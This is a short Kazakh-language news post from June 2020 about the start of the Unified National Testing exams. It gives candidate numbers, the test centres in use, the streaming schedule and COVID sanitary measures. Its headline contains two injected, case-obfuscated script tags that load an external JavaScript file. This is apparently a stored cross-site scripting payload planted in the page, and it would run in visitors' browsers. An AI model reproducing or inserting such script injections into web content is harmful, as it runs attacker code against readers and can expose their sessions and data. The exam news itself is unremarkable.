ҰБТ 21 маусым күні басталады<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.06.2020

🔸21 маусым күні тек 6,5 мың талапкер емтихан тапсырады.

🔸 ҰБТ-ның алғашқы күні 161 пунктің 51-і ғана істейді, оның 44-і ауылдық жерлерде орналасқан. Орташа есеппен 1 ҰБТ тапсыру пунктіне 120 адамнан келеді

🔸21 маусым мен 5 шілде аралығында тестілеу тапсырылатын ағындардың жалпы саны 15-ті құрайды. Аудиторияны тек 50%-ға дейін толтыруға болады. Сәйкесінше, жобалық қуаттылық ҰБТ-ны 6 күннің ішінде өткізуге мүмкіндік бергенімен, шағын ағындарды жинақтау үшін тестілеу 15 күннің ішінде жүргізіледі.

✅ҰБТ өткізілетін әрбір пункте медициналық-санитарлық сипаттағы күшейтілген шаралар қабылданатын болады:

📍дезинфекциялық тоннельден өту;

📍арнайы дезинфекцияланған кілемшеде аяқ киімдерді зарарсыздандыру;

📍дене қызуын өлшеу;

📍қолды зарарсыздандыру сұйықтығымен өңдеу;

📍медициналық маскалар беру.

Просмотров: 640


Пікір қосу



Деректерді қолтаңбаға қосу